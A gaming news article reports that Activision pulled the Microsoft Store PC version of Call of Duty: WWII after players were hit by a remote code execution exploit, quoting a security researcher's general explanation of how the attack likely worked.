The Xbox PC release was probably supposed to be a quiet drop, but what players got instead were pop-ups, downloads, and a lawyer’s face on their desktop.
Activision has removed Call of Duty: WWII from PC Game Pass just days after its release, following credible reports of a remote code execution (RCE) vulnerability. The version affected is the so-called “Xbox PC” build distributed via the Microsoft Store. The game remains live on Steam and Battle.net, although players are now being urged to exercise caution.
An RCE exploit allows an attacker to remotely run malicious code on someone else’s computer. As cybersecurity firm Invicti explains, “The term remote means that the attacker can do that from a location other than the system running the application.” This isn’t about in-game cheating–RCEs are serious security flaws often used to install malware, steal data, or worse.
RCE exploit observed in Call of Duty: WWII gameplay footage
Streamer Wrioh posted a video on X in which Call of Duty: WWII freezes mid-match, followed by a series of suspicious command windows popping up. Moments later, their desktop wallpaper changes to the image of a man’s face:
Another user, @LasagneManne, shared a screenshot showing what appears to be a cheat tool that includes an RCE toggle alongside more traditional features like God Mode and player kicks.
Meanwhile, VX-Underground, a well-known white-hat group that frequently shares malware research, confirmed evidence of RCE abuse. “Someone is trolling gamers with Notepad pop ups, PC shutdowns, and gay pornography,” they posted on X:
VX-Underground admin breaks down the Call of Duty: WWII exploit
In a detailed follow-up, VX-Underground administrator “Smelly” provided a technical breakdown of what’s likely happening in the viral footage. While stressing that it’s an educated guess due to the lack of forensic data, Smelly explained:
“An RCE exploit… is a type of computer exploit in which an attacker is capable of delivering a payload (malicious computer code) to a remote target. More often than not, RCE exploits can possess limitations such as privileges–what it can and cannot execute–depending on whether the application runs as user or admin.”
He added that this issue only affects PC, not consoles like Xbox, because the Xbox OS is more locked down despite using the same core Windows kernel.
As for how attackers might be getting victims’ IP addresses, Smelly explained that Call of Duty: WWII uses outdated peer-to-peer (P2P) networking. Unlike modern titles that rely on dedicated servers, P2P exposes players’ IPs to others in the same lobby–a holdover from older Call of Duty titles.
In the clip from Wrioh, a CMD window appears to show a file being downloaded using the command-line tool cURL. Shortly afterwards, a second CMD window opens Notepad to display a .txt file–likely the downloaded file. Later, when the game crashes or is closed, the desktop wallpaper changes.
“It is worth noting that changing the desktop wallpaper is slightly more complex… which illustrates the attacker is capable of downloading a malicious script and having CMD execute that as well,” Smelly noted.
The most worrying takeaway is that if attackers have administrative privileges, they may also be capable of installing malware such as info stealers, RATs (remote administration tools), or ransomware.
“Thankfully, it appears this attacker is primarily interested in memeing and f******* with people.”
The wallpaper in question reportedly features a well-known lawyer hired by Activision to go after cheat developers–suggesting this exploit may be as much of a statement as it is a prank.
Activision investigating vulnerability in Call of Duty: WWII
Activision has yet to officially confirm the existence of the RCE exploit. In a short statement, the company said the PC version of Call of Duty: WWII had been “brought offline” while it investigates “an issue.”
For now, the Microsoft Store version of the game has been delisted, and affected players are advised not to launch the game until more information becomes available.
